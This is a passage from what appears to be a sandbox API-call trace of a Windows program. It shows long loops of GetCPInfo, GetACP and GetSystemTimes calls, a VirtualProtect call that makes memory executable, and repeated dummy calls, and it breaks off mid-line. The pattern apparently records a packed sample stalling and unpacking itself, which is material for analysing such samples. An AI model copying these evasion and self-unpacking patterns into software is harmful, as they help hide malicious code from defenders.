| out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.673] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.673] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.673] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.673] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.673] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.674] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.674] GetACP () returned 0x4e4 [0111.674] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.675] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.675] GetACP () returned 0x4e4 [0111.675] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.676] GetACP () returned 0x4e4 [0111.676] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.676] GetACP () returned 0x4e4 [0111.676] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.676] GetACP () returned 0x4e4 [0111.676] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.676] GetACP () returned 0x4e4 [0111.676] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.676] GetACP () returned 0x4e4 [0111.676] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.676] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.676] GetACP () returned 0x4e4 [0111.676] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.677] GetACP () returned 0x4e4 [0111.677] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.677] GetACP () returned 0x4e4 [0111.677] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.677] GetACP () returned 0x4e4 [0111.677] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.677] GetACP () returned 0x4e4 [0111.677] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.677] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.677] GetACP () returned 0x4e4 [0111.677] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.678] GetACP () returned 0x4e4 [0111.678] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.678] GetACP () returned 0x4e4 [0111.678] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.678] GetACP () returned 0x4e4 [0111.678] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.678] GetACP () returned 0x4e4 [0111.678] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.678] GetACP () returned 0x4e4 [0111.678] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.678] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.678] GetACP () returned 0x4e4 [0111.678] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.679] GetACP () returned 0x4e4 [0111.679] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.679] GetACP () returned 0x4e4 [0111.679] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.679] GetACP () returned 0x4e4 [0111.679] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.679] GetACP () returned 0x4e4 [0111.679] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.679] GetACP () returned 0x4e4 [0111.679] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.679] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.680] GetACP () returned 0x4e4 [0111.680] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.680] GetACP () returned 0x4e4 [0111.680] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.680] GetACP () returned 0x4e4 [0111.680] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.680] GetACP () returned 0x4e4 [0111.680] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.680] GetACP () returned 0x4e4 [0111.680] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.680] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.680] GetACP () returned 0x4e4 [0111.681] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.681] GetACP () returned 0x4e4 [0111.681] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.681] GetACP () returned 0x4e4 [0111.681] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.681] GetACP () returned 0x4e4 [0111.681] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.681] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.681] GetACP () returned 0x4e4 [0111.681] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.682] GetACP () returned 0x4e4 [0111.682] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0111.682] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0111.682] GetACP () returned 0x4e4 [0112.048] VirtualProtect (in: lpAddress=0x585ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0112.048] AddAtomA (lpString=0x0) returned 0x0 [0112.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.049] AddAtomA (lpString=0x0) returned 0x0 [0112.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.049] AddAtomA (lpString=0x0) returned 0x0 [0112.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.049] AddAtomA (lpString=0x0) returned 0x0 [0112.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.049] AddAtomA (lpString=0x0) returned 0x0 [0112.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.049] AddAtomA (lpString=0x0) returned 0x0 [0112.049] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.049] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.049] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.050] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.050] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.050] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.051] AddAtomA (lpString=0x0) returned 0x0 [0112.051] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.051] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.052] AddAtomA (lpString=0x0) returned 0x0 [0112.052] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.052] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0112.053] AddAtomA (lpString=0x0) returned 0x0 [0112.053] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0112.053] GetCurrentDirectoryA (in: 